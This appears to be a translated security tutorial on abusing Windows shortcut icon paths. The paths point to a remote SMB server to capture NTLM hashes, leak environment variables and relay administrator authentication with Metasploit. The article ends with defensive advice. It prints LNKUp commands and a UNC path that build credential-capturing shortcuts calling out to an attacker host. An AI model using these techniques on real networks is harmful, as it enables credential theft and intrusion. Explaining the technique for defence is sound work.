Windows shortcuts: where do they lead and can they be dangerous?


    In this article we will talk about methods of compromising systems using the standard Windows functionality available when creating shortcuts and how to deal with it.

    How does it work and should I be afraid


    Perhaps the majority of Windows users know that running suspicious programs and clicking on unknown shortcuts is unsafe, and even the most “bad” users try not to do that. So, we will not talk about it.

    And also, most users at least once tried to change the shortcut icon.

    Let me remind you that this is done through properties, something like this:



    And what values ​​can be specified in this field?



    Must the path be local? Not really. Those. you can specify something like this here



    And when the user goes to the directory containing such a shortcut, the following will happen.
    Screenshot from Wireshark on machine 192.168.1.3.



    Server 192.168.1.3 could not accept the TCP connection because it is not listening on TCP port 445, i.e. SMB At first glance, it might seem that there is nothing to worry about, but it is not.

    Server 192.168.1.3 can end the TCP handshake and act like an SMB server. For example, using the Metasploit framework module .



    Let's try to go to the directory with the shortcut again and check the Metasploit console after that.



    We got the NTLM hash of the user who “saw” our shortcut.

    This feature has been known for over 20 years, from the time of WinNT / Win95 and exists to this day. Microsoft offers to deal with this vulnerability using NTLM Blocking . But the user must configure this himself



    And get acquainted with all the “buts”



    Some providers can block outgoing Internet traffic on port 445, which can also protect users on whose machines the corresponding policies are not activated, but it does not protect against attacks on the local network.

    LNKUp - automation of operation


    More recently, the LNKUp tool was released, which allows you to automate the process of creating lnk files, similar to the one we reviewed above. You can download it on the official GitHub .

    The utility is written in Python, runs under Windows and requires the Python packages pylnk and pypiwin32.



    Use the following command to create a shortcut for capturing an NTLM hash.

    python generate.py --host HOST --type ntlm --output out.lnk
    

    where HOST is the machine running the Metasploit SMB server.

    The second use case for LNKUp is to get user environment variables. This works because you can use environment variables in the properties of the shortcut, for example like this:



    To read them, you need to run the sniffer on machine 192.168.1.3

    The command to create the shortcut looks like this:

    python generate.py --host 192.168.1.3 --output out.lnk --type environment --vars PROCESSOR_ARCHITECTURE

    And in the traffic dump we will see



    i.e. the path to the icon in the shortcut properties looked like this

    \\192.168.1.3\SHARE_%PROCESSOR_ARCHITECTURE%

    Thus, the user does not need to specifically launch something, he just needs to go to the directory in which the malicious shortcut is located, for example, to a network directory or to "see" it when connecting external media.

    SMB-Relay when browsing a directory


    Using the Metasploit framework, you can also raise another kind of SMB server using the exploit / windows / smb / smb_relay module and conduct an attack of the form SMB Relay.



    Now suppose that a malicious shortcut has been placed in a network directory that administrators usually use to install software. The next time you open such a directory, the NTLM administrator authentication will be redirected to the selected machine on the network.



    And a metterpreter session will be received





    Based on all of the above, perhaps we can conclude that NTLM authentication should be abandoned wherever possible, as well as pay increased attention to network security and access to shared resources on which an attacker can place malicious objects.

    Also popular now: